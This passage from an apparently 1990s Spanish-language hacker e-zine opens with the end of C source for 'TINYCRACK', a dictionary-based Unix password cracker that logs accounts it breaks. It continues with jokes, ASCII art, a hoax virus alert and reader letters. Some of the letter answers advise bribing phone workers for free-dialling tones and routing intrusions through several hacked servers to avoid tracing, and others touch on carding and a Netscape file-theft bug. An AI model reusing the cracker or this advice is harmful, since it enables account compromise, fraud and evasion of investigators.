   p=fopen(i,"r");
   printf("WordList File: "); gets(i);
   w=fopen(i,"r");
   printf("Results File : "); gets(i);
   o=fopen(i,"w");

   fprintf(o,"*** TINYCRACK v1.0 ***\n\n*** PASS 1: NULL PASSWORDS ***\n");

   while(ps)
   {
         fetch(es,p,as,ps);
         if(ps) if(ps[-1]==':') fprintf(o,"| User [%s] has no password!\n",as);
   }

   fflush(o); rewind(p);

   fprintf(o,"*** PASS 2: ACCOUNT NAMES ***\n");

   do
   {
         fetch(es,p,as,ps);
         if(ps) if(!strcmp((char *)crypt(as,ps),ps))
                   fprintf(o,"| User [%s] has password [%s]\n",as,as);

   } while(ps);

   fflush(o); rewind(p);

   fprintf(o,"*** PASS 3: DICTIONARY WORDS ***\n");

   do
   {
         rewind(w);
         fetch(es,p,as,ps);

         do
         {
            fgets(ws,130,w);
            ws[strlen(ws)-1]=0;

            if(!strcmp((char *)crypt(ws,ps),ps))
            {
                  fprintf(o,"| User [%s] has password [%s]\n",as,ws);
                  fflush(o);
                  break;
            }

         } while(!feof(w));

  } while(!feof(p));

  fprintf(o,"*** FINISHED SESSION ***\n");
  exit(1);

}
..............................................................................

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 rared00dz: aqui les envio algunos de los mensajes que hemos interceptado de
 servidores mexicanos que son totalmente inservibles para nosotros pero
 resultan comicos o interesantes...

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

>   Unos chistes:
> 
> 1) Esta Pedrito en la clase de historia y le preguntan:
> A ver Pedrito quien descubrio America?
> - No lo se , seorita................
> muy mal , Pedrito, muy mal......bueno hay alguien quien lo sepa?
> 
> Entonces se levanta un japones que habia en la clase y contesta:
> Colon, honorable seolita........
> Al momento se oye una voz que dice:
> MALDITOS JAPONESES!!!!!
> 
> la seorita muy enfadada pregunta:
> Quien dijo eso?????
> Pedrito se levanta y responde:
> General Mc Arthur,1945.........
> 
> 
> 2) Mama,mama en el colegio me han llamado mafioso.
> -Bueno hijo ya ire yo maana a arreglar eso.
> -Bueno mama, pero que parezca un accidente.................
> 
> 3) Esto es un misionero que esta en plena selva y se encuentra de bruces
> con un leon que estaba casi muerto de hambre . El misionero se asusta y se
> pone de rodillas, empezando a rezar dice:
> Padre infunde a este pobre leon sentimientos cristianos......
> Se oye un silencio y de buenas a primeras el leon se pone de rodillas,
> diciendo: Padre, bendice estos alimentos que voy a recibir.............
> 
> 
> 4) Que pena......no puedo usar windows........mi gato se ha comido el
> raton.......
> 
> 5) Sabes como dejas intrigado a un cerdo?
> -Maana te digo.......
> 
> 6) Entre dos locos:
> A ver si adivinas lo que tengo en la mano?
> Un elefante....
> no vale!! Me has visto.........
> 
> 7) Nunca  me olvidare  la ultima frase de mi padre.....:
> Paco no muevas el
> andamioooooooooooooooooooooooooooooooooooooo..............
> 
> 8) un empleado a su jefe:
> Si no puede usted aumentarme el sueldo.....porque no me lo da mas a
> menudo????
> 
> Ah y la nueva frase que  he acuado :
> No es lo que pasa.....sino como pasas,lo que pasa
> 
> {{{ }}}    Montse   (en lenguaje cibernetico es un abrazo)

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

Que onda?, Aqui les mando un mail que, si saben Unix, les va a gustar...
Bye....

					.....McLeod

HOW THE WORLD WAS CREATED...BY COMPUTER
_____________________________________________________________

      IN THE BEGINING
(To justify God's ways to the 21st century)

  In the begining was the computer. And God took a sit in front of it and
this is what happened :
#************************************
#* Welcome to SimUniverse Computers *
#************************************
#Please Enter your login name : God
#password : omniscient
#
#login or password incorrect , try again
#password : omnipotent
#login ok.. entering system

   And God signed on 12:01 a.m., Sunday, March 1.

$ Let there be light!
# Unrecognizable command. Try again!
$ Create light
# Done.
$ Create heaven
# Done.
$ Create earth
# Please wait... terraforming... calculating... Done.
$ Run heaven and earth
# Done.

   And God created Day and Night. An God saw there were 0 errors.
And God signed off at 12:02 a.m., Sunday, March 1.

# Approx. funds  remaining: $92.50.

  And God signed on at 12:00 a.m., Monday, March 2.

$ Let there be firmament in the midstm of the water and
# Unrecognizable command. Try again!
$ Create firmament
# Done.
$ Run firmament
# Done.

   And God divided the waters. And God saw there were 0 errors.
And God signed off 12:02 a.m., Monday, March 2.

# Approx. funds remaining: $84.60.

  And God signed on at 12:00 a.m., Tuesday, March 3.

$ Let the waters under heaven be gathered together unto one place
and let the dry land appear and
# Too many characters in string especification! Try again!
$ Run dryland
# Done.

 And God created Earth and Seas. And God saw there were 0 errors.
And God signed off 12:01 a.m., Tuesday, March 3.

# Approx. funds remaining: $65.00.

  And God signed on at 12:00 a.m., Wednesday, March 4.

$ Create lights in the firmament to divide the day fron the night
# Unspecified type. Try again!
$ Create sunmoonstars
# Done..

   And God created Sun, Moon, Stars. And God saw there were 0 errors.
And God signed off 12:01 a.m., Wednesday, March 4.

# Approx. funds remaining: $54.00.

  And God signed on at 12:00 a.m., Thursday, March 5.

$ Create fish
# Done.
$ Create fowl
# Done.
$ Run fish'nfowl
# Done.

    And God created the great seamonsters and every living creature
that creepeth wherewith the waters swarmed after its kind and
every winged fowl after its kind. and He saw there were 0 errors.
And God signed off 12:01 a.m., Thursday, March 5.

# Approx. funds remaining: $45.60.

  And God signed on at 12:00 a.m., Friday, March 6.

$ Create cattle
# Done.
$ Create creepy things
# Done.
$ Now let us make man in our image
# Unspecified type! Try again!
$ Create man
# Done.
$ Be fruitful and multiply and replenish the earth and subdue it
and have dominion over the fish of the sea and over the fowl
of the air and over every living thing that creepeth upon the
earth
# Too many command operands! Try again!
$ Run multiplication
# Execution terminated. 6 errors.
$ Insert breath
# Done.
$ Run multiplication
# Execution terminated. 5 errors.
$ Move man to Garden of Eden
# File ``Garden of Eden'' not found.
$ Create Garden
# Done.
$ Move man to Garden of Eden
# Done.
$ Run multiplication
# Execution terminated. 4 errors.
$ Copy woman from man
# Done.
$ Run multiplication
# Execution terminated. 3 errors.
$ Insert woman into man
# Illegal parameters! Try again!
$ Insert man into woman
# Done.
$ Run multiplication
# Execution terminated. 2 errors.
$ Create desire
# Done.
$ Run multiplication
# Done.

  And God saw the man'n woman being fruitful and multiplying in the
Garden

# Execution for Warning: No time limit on this run. 1 errors.
$ Create freewill
# Done.
$ Run freewill
# Done..

  And God saw the man'nwoman being fruitful and multiplying in the
Garden

# Execution Warning: No time limit on this run. 1 errors.
$ Undo desire
# Desire cannot be undone once freewill is created
$ Destroy freewill
# Freewill is an inaccesible file and cannot be destroyed.
# Enter replacement, cancel, or ask for help.
$ Help!
# Desire cannot be undone once freewill is created.
# Freewill is an inaccesible file and cannot be destroyed.
# Enter replacement, cancel, or ask for help.
$ Create treeofknowledge

  And God saw the man'nwoman being fruitful and multiplying in the
Garden

# Execution Warning: No time limit on this run. 1 errors.
$ Create good'nevil
# Done.
$ Activate evil
# Done.

  And God saw he had created shame.

# Warning: System error in sector E96. Man'nwoman not in the Gard.En. 1
errors.
$ show Garden
# Not found.
$ Search Garden for man'nwoman
# Searching.... Search Failed . Not Found.
$ Delete shame
# Shame cannot be deleted once evil has been activated.
$ Destroy freewill
# Freewill is an inaccesible file and cannot be destroyed.
$ Stop
# Unrecognizable command. Try again!
$ Break
$ Break
$ Break
#      ATTENTION ALL USERS: ATTENTION ALL USERS:
#   COMPUTER GOING DOWN FOR REGULAR DAY OF MANTENANCE
#                   PLEASE SIGN OFF
$ Create new world
# You have exceeded your allocated file space. Please delete old files.
$ Destroy earth.
# Destroy earth. Please confirm.
# Confirmation Timed out. Cancelling Action.
COMPUTER DOWN. COMPUTER DOWN
#   SERVICES WILL RESUME ON SUNDAY MARCH 8 AT 6:00 A.M
#                   YOU MUST SIGN OFF NOW!
# You have been disconected from SimUniverse Server.
 And God signed off at 11:59 p.m., Friday, March 6.
And God saw he had zero funds remaining.

					HiGhLaNdEr
				LeT YoUr SoUl Be YoUr PiLoT

-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|


         (__)                   )__(                vv    vv
         (oo)                   (oo)                ||----||  *
  /-------\/             *-------\/                 ||     | /
 / |     ||             / |     ||                 /\-------/
*  ||----||            /  ||----||                (oo)
   ^^    ^^               vv    vv                (~~)

    USA Vaca            Nerd USA Vaca              Vaca Australiana

        (__)                 (__)                    (__)
        (00)                 (-o)                    (--) . . . (*>YAWN<*)
  /------\/            /------\/               /------\/
 /|     ||            /|     ||               /|     ||
* ||----||           * ||----||              * ||----||

Vaca con lentes      Vaca Coqueta             Vaca sin dormir

               O__O                             \_|_/
               (oo)                             (oo)
        /-------\/                       /-------\/
       / |     ||                       / |     ||
      *  ||----||                      *  ||----||
         ^^    ^^                         ^^    ^^
 Vaca en Disneylandia        Vaca visitando la estatua de la libertad

              \ (__)                         (__)        *        (__)
              \\(oo)                         (\/)         \       (oo)
         /-----\\\/                   /-------\/           \-------\/
        / |    (##)                  / |     ||           8-|     ||
       *  ||----||"                 *  ||----||             ||----||
          ^^    ^^                     ~~    ~~             ^^    ^^
 Vaca escocesa tocando gaita        Vaca de Beijing

*        (__)              (__)               (__)               (__)
 \       (oo)              (oo)               (oo)               (oo)
  \-------\/        /-------\/         /-------\/         /-------\/
  /|      |\       / /      \         / \      /         / \      \
 //||----||\\     * //------\\       *   \\--//         *   \\----\\
 ^ ^^    ^^ ^       ^        ^            ^  ^               ^     ^
Vaca caminando    Vaca trotando       Vaca corriendo     Vaca frenando

          (__)
          (oo)                       (__)         *     (__)
           \/                        (oo)         |     (oo)
       ____| \____            /-------\/    o=o=o=|------\/
       ---/   --**           / |       /          |      |
    *____/    |___//        *  ||----||           ||----||
        //--------/            ^^    ^^           ^^    ^^
       //__
    Vaca marchando           Vaca parada        Vaca cagando

         (__)
         (oo)                       U
  /-------\/                    /---V
 / |     ||                    * |--|                       .
*  ||----||
   ^^    ^^
 Vaca a 1 metro.       Vaca a 100 metros.           Vaca a 10,000 metros.

         (__)             (__)                (__)               (__)
         (oo)             (oo)                (oo)               (oo)
  /-------\/-*     /-------\/          /-------\/         ~~~~~~~~~~~~~~~~~
 / |     || \     )*)(\/* /  *        / |     ||
*  ||----||  *   \ |||/)|/()(       ~~~~~~~~~~~~~~
\/|(/)(/\/(,,/   \)|(/\/|)(/\
 Vaca comiendo   Vaca comiendo       Vaca en agua           Vaca nadando
     pasto            vaca

         (__)                     (__)                     (__)
         (OO)                     (@@)                     (xx)
  /-------\/               /-------\/               /-------\/
 / |     ||               / |     ||               / |     ||
*  ||----||              *  ||----||              *  ||----||
   ^^    ^^                 ^^    ^^                 ^^    ^^

Vaca que tomo Jolt     Vaca que comio hongos    Vaca que uso Jolt para lavar
                           psychodelicos            hongos psychodelicos

               )\               (__)
              /  \              (oo)
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Vaca nadando en agua con tiburones

     (  (    )
   ( (     )   )
   ( (         )
  (           / )
 ( ( \\       )
     ( |  // )
       |   |    (__)
       |   |    (oo)                   (__)
       |   | ----\/              ______(oo)_____
       |   |    ||              ( _)_______(__) )
     **|   | ---||                \ __________/
    ``'---------^^
     Vaca escondida                Pay de vaca

                        *
                      **   **
                 * **  * * *  **
                *   /  /   \ *  *
             \  \ /  \        / /                         (__)
          *  /  / \  \  (__)  \ \                /--------(00)
            /           (00)  / /               / |      |(  )
            \    /-------\/   \ \              *  ||---- ||()
            /   / |     ||    / /                 ||     ||
          \ \  *  ||----||    \ \                 ^^     ^^
         /  /     ^^    ^^    / /          Vaca masticando canicas
               Vaca en calor

          (__)             (__)         *        (__) *      (__)
          (oo)             (oo)          \       (oo) |      (oo)
  /--------\/      /-oooooo-\/            \-------\/  \-------\/
 * o|     ||      * ooooooooo           o  o|     ||   /     ||
    ||----||     ooooooooooooo              ||----||>==/-----||
 ooo^^    ^^    ooooooooooooooooo           ^^    ^^         ^^
 Vaca cagando    Vaca en deep shit       Vaca que le estan pateando
                                            la caca fuera de ella
                                         /\                  __
                                        /  \                 ||
             (__)                 (__)  \  /               (_||_)
             SooS                 (oo)   \/                 (oo)
      /------S\/S          /-------\/    /S          /-------\/
     / |     ||           / |     ||    /  S        / |     ||
    *  ||----||          *  ||----||___/    S      *  ||----||
       ^^    ^^             ^^    ^^                  ^^    ^^
Vaca de George Washington Vaca de Ben Franklin    Vaca de Abe Lincoln
                                                     (__)
                     (__)                            (oo)
                     (oo)                           /'^^^-m
        /---+      +--\/                           / '' ` )
       / |  |      | ||                           |      /|
      *  ||-+      +-||                           |  |  | |
         ^^          ^^                           |_____|_|
  Vaca de David Copperfield                        //|| ||
                                                  *  ww ww
                                                Vaquidracula

         (__)                     (__)                     (__)
         (\/)                     ($$)                     (**)
  /-------\/               /-------\/               /-------\/
 / | 666 ||               / |=====||               / |     ||
*  ||----||              *  ||----||              *  ||----||
   ^^    ^^                 ^^    ^^                 ^^    ^^

Vaca satanica            Vaca Yuppie              Vaca enamorada

              (____)               (____)
              (oo  )               (o  o)
   /-----------\  /          /-----\    /----
  / ||       |  \/          / |   |  \/   |
 /  ||       ||||           \ |  |      | | |
*   ||||-----||||            *| | |-----| | |
    /\/\     /\/\             /\ /\     /\ /\
 Vaca de Pablo Picasso   Vaca de Salvatorre Dali

                        (__)
                ^^      (oo)
            ^^^^ /-------\/
         ^^^^^  / |     ||
       ^^^^^   *  ||----||
    ^^^^^^^^  ====^^====^^====
^^^^^^^^^^^^^/
^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     Vaca surfeando en Malibu
        *
         \
          \
          |\
        \ | \ (__)
        \\|| \(oo)
         \||\ \\/
          ^^ \||
           \\ ||
            \\||
             \||
              ^^
               \\_
                \_
 Vaca skiando en Aspen Colorado

                            o        o             (__)    ^
                             \      /              (oo)   /
                              \    /           _____\/___/
             (__)              \__/           /  /\ / /
             (oo)       _______(oo)          ^  /  * /
    /---------\/       /|  ___  \/             / ___/
   / | x=a(b)||       / | {   }||         *----/\
  *  ||------||      *  ||{___}||             /  \
     ^^      ^^         ||-----||            /   /
                        ^^     ^^           ^    ^

 Vaca Matematica       Vaca de T.V.     Vaca bailando disco despues
                                             aspirar cow-caine

            o
            | [---]
            |   |
            |   |                              |------========|
       /----|---|\                             | **** |=======|
      /___/___\___\                         o  | **** |=======|
      |            |                     ___|  |==============|
      |           |                ___  {(__)} |==============|
      \-----------/             [](   )={(oo)} |==============|
       \  \   /  /             /---===--{ \/ } |
    -----------------         / | NASA  |====  |
    |               |        *  ||------||-----^
    -----------------           ||      |      |
      /    /  \   \             ^^      ^      |
     /     ----    \
      ^^         ^^           Vaca llegando a la Luna

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

A TODOS LOS USUARIOS DE INTERNET
INFORMACION PROVENIENTE DE IBM INTERNACIONAL

Este mensaje debe ser comunicado a cualquier persona que tenga acceso
a Internet.

Si alguien recibe un mensaje de correo electronico llamado "Pental
Greetings", por favor BORRARLO SIN ABRIR!!!

Esta es una advertencia para todos los usuarios de internet. Existe un
virus muy peligroso que esta distribuyendose a traves de la red de
Internet y llamado " PENPAL GREETINGS".

NO ABRIR EL MENSAJE LLAMADO "PENPAL GREETINGS" !

Este mensaje aparenta ser una carta amigable preguntandole si usted
esta interesado en penpal (??), pero para el tiempo que Usted lea el
mensaje, es demasiado tarde!!: el virus "TROJAN HORSE" habra infectado
ya el sector boot de su sistema, BORRANDO TODOS SUS DATOS.  Este es un
virus auto-regenerable y tan pronto como el mensaje ha sido leido, se
expandera automaticamente a todas las direcciones de correo
electronico contenidas en su directorio (Mail box). Este virus
destruira su disco duro y tiene el potencial de destruir el disco duro
de cualquiera presente en su directorio.

Si el virus se sigue propagando, podria causar danos catastroficos en
la red mundial de Internet!

Asi que por favor, BORRE el mensaje "PENPAL GREETINGS" antes de
leerlo!! y envie este mensaje a todas las personas que conozca y que
usen Internet para advertirlos acerca de este virus!!

              [ La estupidez *si* crece en los arboles... ] 

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 Como limpio el Cache de mi browser??

 [ si usas microsoft explorer simplemente borra todos los archivos que tengas
   en el directorio C:\WINDOWS\CACHE  Si usas Netscape borra los archivos que
   tengas en c:\netscape\cache o c:\program files\netscape\cache  Existe otra
   forma mas "chic" de hacerlo y es en opciones, limpiar cache o en
   configuracion, network preferences, clean disk cache. ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

  me gustaria tener los codigos de telefonos para llamar gratis de mi pais,
  como podria conseguirlos ??

 [ simplemente consigue un billete de 20 dolares (puede ser falso) y cuando
   veas a tu trabajador telefonico mas cercano acercate, cuentale lo mucho
   que te gustaria conocer el sistema telefonico y cuando menos lo espere...
   BAMM! Ofrecele los 20 dolares a cambio de los tonos para marcar gratis
   que alguien te platico, si no acepta o dice que no existen entonces
   preguntale por claves para llamar gratis. Generalmente aceptan y no es
   delito en caso de amenazarte retirate y espera la proxima camioneta
   telefonica :-)  No te dejes cuando te pida tu direccion, si no los tiene y
   te dice que luego pasa a dejarte los tonos grabados en un cassette citalo
   en una esquina lejos de tu casa y si puedes prueba los tonos antes de
   entregarle el dinero. ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 empezando en este rollo , aparte de ser muy padre y me gustaria saber como
 colaborar con ustedes , espero pronto su respuesta !  GrAcIaS !!

 [ para colaborar con nosotros envia todo lo que puedas a RareGaZz@Bigfoot.com
   links a software, revisiones de peliculas, revistas y modos de vida son
   bienvenidos. Esta revista es para ustedes unicamente y de ustedes depende
   que siga saliendo como hasta el momento. ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 Bueno, les planteo algo (para fines educacionales, logico)
 necesito hallar los passwords que configure de unos emails...
 resulta que ya configure el netscape. Lo que me falta es unicamente
 mandar un programa que sea compatible con Windows y que pueda
 utilizar para el netscape. Un programa busca passwords.

 [ Si alguien tiene informacion sobre los passwords en netscape navigator
  o tienen un programa que saque el pass de ese programa envienlo...]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\
 
 HAL-9000 BBS Internet - Morelia UMSHN - Universidad Michoacana de San Nicolas

 HAL-9000 BBS Internet es el nuevo hermano de HAL-9000 Fidonet el originalismo
 HAL-9000 BBS. Este tiene la ventaja de que puede ser accesado via Internet,
 de cualquier parte de mundo, ademas de que es multiusuario.
 El enfoque de este BBS es hacia foros o boards;tambien tiene capacidad de
 chat. Actualmente esta configurado para aceptar unicamente 10 conexiones
 simultaneas.

 Para accesar HAL-9000 BBS Internet :
 telnet://bbs.ccu.umich.mx

 IMPORTANTE: En respuesta al login escribe bbs y return, cuando pida el
             password.

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 Si por algun motivo no pueden entrar a i-net para obtener su copia de este
 E-Zine o quieren entrar en ambiente hacker en Mexico DF pueden marcar el
 numero 280-2899 de Alfa BBS...chequenlo y luego me cuentan que tal ok?

 ALFA BBS 280-2899  Mexico D.F.,

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

sobre algo que habian dicho en uno de los numeros de la revista sobre el
hackear con condon, tengo una duda... no importa que tan lejos o que tan
cerca esten los servidores a donde te conectas antes de llegar a tu objetivo?
por ejemplo. podria conectarme a 4 distintos servidores que estan dentro de
la ciudad de mexico y despues llegar a mi objetivo , igual dentro de la
ciudad y no habria problema de rastreo?  bueno, ojala que me contesten pronto!

 [ La razon de hackear a travez de varios servidores es unicamente para que
  a las personas que quieran rastrearte se les dificulte el tener que andar
  revisando logs de distintos servidores. Obviamente si hackeaste al servidor
  blanco a travez del servidor negro y gris, cuando el administrador quiera
  llegar a ti necesita pedir ayuda al administrador del servidor negro para
  localizar al usuario que lo hackeo. Despues el administrador del servidor
  negro notara que el hacker no es un usuario local sino que entro desde el
  servidor gris por lo que el tambien necesitaria pedir ayuda al otro
  administrador y asi... Obviamente NUNCA UN ADMINISTRADOR PEDIRA AYUDA A
  OTRO PARA AGARRAR A UN HACKER!!! Hacerlo significaria aplastar su orgullo
  para decir "un hacker me supero y entro a mi sistema".Y en caso de hacerlo,
  si el hacker uso otro ordenador para entrar a hackear,el otro administrador
  probablemente no se atreva a contestar "ese hacker tambien burlo mi
  seguridad entrando desde X sistema" por lo que generalmente le dira que no
  encontro nada en sus logs y todo el asunto se olvidara y asi ninguno de los
  dos administradores perdera su trabajo. Creanme esto que les digo, en mi
  carrera de hacker he conocido a muchos admins y conozco sus formas de
  pensar. Obviamente no todos los admins son iguales pero aquellas raras
  excepciones *realmente* se esmeran en proteger sus sistemas y no tienen
  problemas de hackers :)  perdon por la respuesta tttaaaannnn larga . . . ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 Todos ustedes habran escuchado la noticia sobre las carreteras de Los Angeles
 California. Es probable que dentro de poco tiempo los carros circulen por
 esos caminos sin intervencion humana; asi es, la persona detras del volante
 tendra manos y piernas libres mientras el carro ayudado por satelites y
 emisores electricos en el camino maneje por la carretera. Esto es genial,
 sobre todo en la ciudad sede del descubrimiento ya que en Los Angeles como
 en cualquier parte del mundo es dificilisimo disparar una escopeta mientras
 se maneja :-)
 Afortunadamente el software que controlara las habilidades de manejo del
 automovil no sera creado (en el momento) por Microsoft de lo contrario las
 prisiones se inundarian de malos programadores ya que por primera vez sus
 BUGS costaran no solo frustracion para el usuario, sino sus vidas... :)
                                                                     raretrip

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Pues aqui molestando de nuevo y tengo una duda, bueno mas que una duda 
es una peticion:
En su numero 4 lei su articulo sobre CARDING ademas de que en un numero 
anterior lei el articulo sobre INGENIERIA SOCIAL por lo que estoy muy 
interesado sobre el CARDING.
Asi que quisiera poder leer otro articulo sobre CARDING para ir aumentando
mis conocimientos sobre este tema.

 [ proximamente escribire una continuacion del texto por Mr.X basado en
   algunas experiencias de amigos ... >:-) ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

Ferca Network: http://www.ferca.net
Web Personal: http://www.ferca.net/ferca
Lo que es gratis en Internet: http://www.ferca.net/esgratis

 A nosotros nos llego la invitacion a este sitio y espera le envien sus
 comentarios sobre toda la informacion que tiene disponible en su pagina.
        [ El link ya esta en la pagina web seccion internet. CkSmkr ]

 - = - = - = - =  - = - =  - = - =  - = - = - = - = - = - = - = - = - = - = -

 http://www.class.udg.mx/~victorov/

 Si les gustan los virus o quieren aprender como esta eso de la inteligencia
 artificial visiten esta pagina. Tal vez luego nos haga un resumen de su
 trabajo con los virus para la revista :-)
 P.D. Gracias a el conseguimos el virus ZHENGXI !
      [ El link esta en la seccion de hacking en la pagina web. CkSmkr ]

 La revista dejara de hacer las 'reseas' desde este numero. La ultima vez que
 puse links fue por agradecimiento a unas paginas que usaron uno de nuestros
 logos para poner un link a la pagina.

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 GR337Z 4 70D0S L0S Qu3 N0S 4YuD4N 4 3L4B0R4R 3S74 R3ViS74 Y 74MBi3N 4 L0S
 Qu3 N0S 4YuD4N C0N L4 P4GiN4 W3B C0N C0M3N74Ri0S Y/0 GR4FiC4S. 3N 3SP3Ci4L
 uN S4LuD0 C0M0 Si3MPR3 4 V0V_77, 7uC4NX, 4RK4NG3L, 4CiDGuM, RiCKY, M3G4FL0P,
 XD4WN, GuYBrU2H Y 4 70D0S L0S CHiC0S M4L0S D3 RDK.
 S4LuD0S 3SP3Ci4L3S V4N P4R4 GR00VY Y S3RV3RH4CK3R P0R S4C4R 4D3L4N73 Nu3S7R4
 0LViD4D4 S3CCi0N D3 N07iCi4S. 0K! L0S CR3Di70S H4N SiD0 D4D0S...

     [ culpese a los hackers de la degeneracion de la escritura. CkSmkr ]

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

                    / \     /\\   /\                      /\    //\\
           /\     / /\     //  \\ /\ \        /\        / /    //  \\
         / /\ \ / /       /\/        \ \    / /\ \    / /          //
     __/ /    \_/       //            \ \/ /    \ \ / /           //
     __/                \ \ \ \          \/        \/           //  /\
                                                                 \\ //
                   Cuando matas  a un hombre,  eres  asesino      \/
                   Cuando matas muchos, eres un conquistador
                   Cuando matas  a  todos... eres  un  dios.
                                                    Megadeth

 Bienvenidos a la primera *verdadera* seccion de noticias en una revista
 electronica. Para ser la primera vez que hacemos esta seccion nosotros creo
 que nos quedo aceptable >;)
 Disfruten esta nueva presentacion de NotiLOONS; manden sus comentarios y
 noticias...
 
 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

En su convencion anual la asociacion britanica de medicos recomendo legalizar
los quimicos que alteran los sentidos de la marijuana.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Netscape BUG

Netscape dice que cuando aparezca un boton de "warning" en un sitio inseguro,
presionen CANCEL.

Netscape dice que es un bug no muy serio pero esto depende de cada persona.
yo creo que un bug que permita buscar archivos en tu disco duro y luego
subirlos a la pagina es bastante serio...pero netscape no lo piensa asi.

Todos saben que netscape tiene una funcion que permite subir archivos de tu
disco a un servidor verdad? pues el bug permite hacer esto sin que el usuario
se de cuenta! la unica cosa necesaria es saber la localizacion exacta del
archivo deseado. Un ejemplo seria agarrar el c:\netscape\cache\fat.db del
disco de algun visitante para ver el nombre de las paginas y el URL de cada
lugar que haya visitado. existen mas formas de explotar este bug.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Alemania a aprobado la primera gran ley de internet, diciendo que es un
crimen poner contenido ilegal en Alemania si es tecnica y razonablemente
posible prevenirlo. Las penas estan en duda aun.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

El "profesional en sistemas" -como prefiere que lo llamen- que descubrio el
BUG en el servidor de microsoft ha decidido no cooperar con microsoft para
cualquier problema relacionado con la seguridad debido al "mal trato" que
recibio de la compaia del magnate Gates.
La persona esta que niega ser un "hacker" a empezado a vender con exito en
su sitio web camisetas con la leyenda "I crash the microsoft website and all
i got was this damn t-shirt" (Yo estrelle el sitio de microsoft y todo lo que
me dieron fue esta maldita camiseta). Esto es una broma a microsoft que le
ofrecio una camiseta y descuento en cupones para software por su ayuda.
Actuando como todo el hacker que dice no ser, no acepto la oferta de
microsoft y se niega a cooperar en futuras ocasiones con esa compaia.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

Varias redadas en la ciudad de Madrid con motivo de operativos policiales para
derribar a los hackers que habitan en el pais de Espaa.
Los operativos han sacado momentaneamente de circulacion a un popular servidor
de paginas web gratuitas (www.islatortuga.com) para hackers pero ya esta de
nuevo on-line al parecer no por mucho tiempo.

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 Ahora que el Partido Revolucionario Institucional (PRI) ya no tiene la
 mayoria en la camara de diputados, se corre el riesgo de una !! DIVISION DEL
 PODER EN MEXICO !!
 Concretamente el riesgo es que se divida el poder en Legislativo, Judicial
 y Ejecutivo... cosa que destruiria a Mexico >:-]

 El Chamuco ao 1 numero 36
 ~~~~~~~~~~~~~~~~~~~~~~~~~~
 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 El dictador de Peru Alberto Fujimori esta a punto de ser corrido a patadas
 de su propio pais por haber introducido el modelo economico neo-liberal.
 Hermanos peruanos nosotros los mexicanos se los decimos por experiencia,
 cuando Fujimori termine en Irlanda llegara otro dictador mas pendejo y las
 cosas seguiran igual . . . :)

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 DETROIT - General Motors anuncio que empezara a sacar del publico 292,860
 pontiacs, oldsmobiles y buicks de los modelos 1996 y 1997 por un error en
 el software de la maquina que puede resultar en fuego.

 Los carros son los pontiac bonneville 1996, oldsmobile noventa y ocho,
 ochenta y ocho, buick park avenue, lesabre, riviera, regal, y algunos buick
 le sabres 1997.

 General Motors dijo que un error en la secuencia en el sistema del motor
 puede ocasionar un fuego durante el arranque.

 Con la proliferacion de la tecnologia de computadoras en los automoviles,
 tenia que pasar algun dia...

 ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )><( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( )

 Tenia que pasar tarde o temprano. IDT Corp esta instalando ya su nuevo
 producto Net2Phone Direct, un servicio telefonico de Internet que puedes
 usar desde cualquier telefono (Nueva York Inicialmente). Tu marcas a un
